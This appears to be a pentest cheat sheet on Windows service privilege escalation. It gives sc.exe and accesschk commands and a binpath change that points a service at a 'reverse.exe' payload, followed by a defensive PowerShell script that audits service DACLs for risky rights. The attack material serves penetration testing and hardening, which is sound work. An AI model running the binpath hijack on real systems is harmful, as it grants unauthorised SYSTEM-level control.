Service Exploitation
Basic commands for abusing services to elevate privileges once a vulnerable service has been identified with a tool such as WinPEAS.
Basic Commands
# Query the configuration of a service
sc.exe qc $service_name
# Query the current status of a service
sc.exe query $service_name
# Modify an option on a service
sc.exe config $service_name $option= $value
# Start and stop a service
net start $service_name
net stop $service_name
Accesschk.exe
Use Accesschk.exe to validate service permissions:
.\accesschk.exe /accepteula -uwcqv user $service_name
What we are looking for in the output are the SERVICE_START and SERVICE_STOP permissions. We also want to confirm that it is running under a user with higher privileges (e.g., LocalSystem).
Notes
Validate whether you can start/stop the service or reboot the machine. If you cannot, you may not be able to use it to escalate your privileges.
Check if we can reboot the system with:
whoami /priv
An easy way to escalate privileges utilizing a service is to modify the binaries path. The following demonstrates an example of this:
sc.exe config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""
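To check the same permissions from the defensive side, the following added example (not from the original page) parses service security descriptors and flags entries that let broad groups reconfigure a service, which is the right the binary path change above depends on. The helper name Get-RiskyServiceAce, the service name ExampleSvc and the sample SDDL string are constructed for illustration; the live loop reads each descriptor with sc.exe sdshow.

```powershell
# Added example: flag service DACL entries that give broad groups control of a service.
# Rights that allow reconfiguring a service (for example its binary path) or its DACL.
$RiskyRights = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x00000002
    WRITE_DAC             = 0x00040000
    WRITE_OWNER           = 0x00080000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
}
# Well-known SIDs that include ordinary, non-administrative users.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

function Get-RiskyServiceAce {   # hypothetical helper name
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$Sddl
    )
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only plain allow entries are evaluated; deny and object ACEs are skipped.
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $sid = $ace.SecurityIdentifier.Value
        if (-not $BroadSids.ContainsKey($sid)) { continue }
        $hits = @($RiskyRights.Keys | Where-Object { $ace.AccessMask -band $RiskyRights[$_] })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Service = $Name; Trustee = $BroadSids[$sid]; Rights = $hits -join ', ' }
        }
    }
}

# Constructed sample descriptor: Authenticated Users (AU) hold DC = SERVICE_CHANGE_CONFIG.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)'
Get-RiskyServiceAce -Name 'ExampleSvc' -Sddl $sample

# Live audit: read each service's descriptor with sc.exe sdshow and report findings
# together with the account the service runs as.
Get-CimInstance Win32_Service | ForEach-Object {
    $svc  = $_
    $sddl = (sc.exe sdshow $svc.Name | Where-Object { $_ -match '^[DO]:' }) -join ''
    if ($sddl) {
        Get-RiskyServiceAce -Name $svc.Name -Sddl $sddl |
            Add-Member -NotePropertyName RunsAs -NotePropertyValue $svc.StartName -PassThru
    }
}
```

Run the live loop from an elevated prompt so every descriptor is readable. Any row where RunsAs is LocalSystem and the trustee is a broad group is a service whose DACL should be tightened.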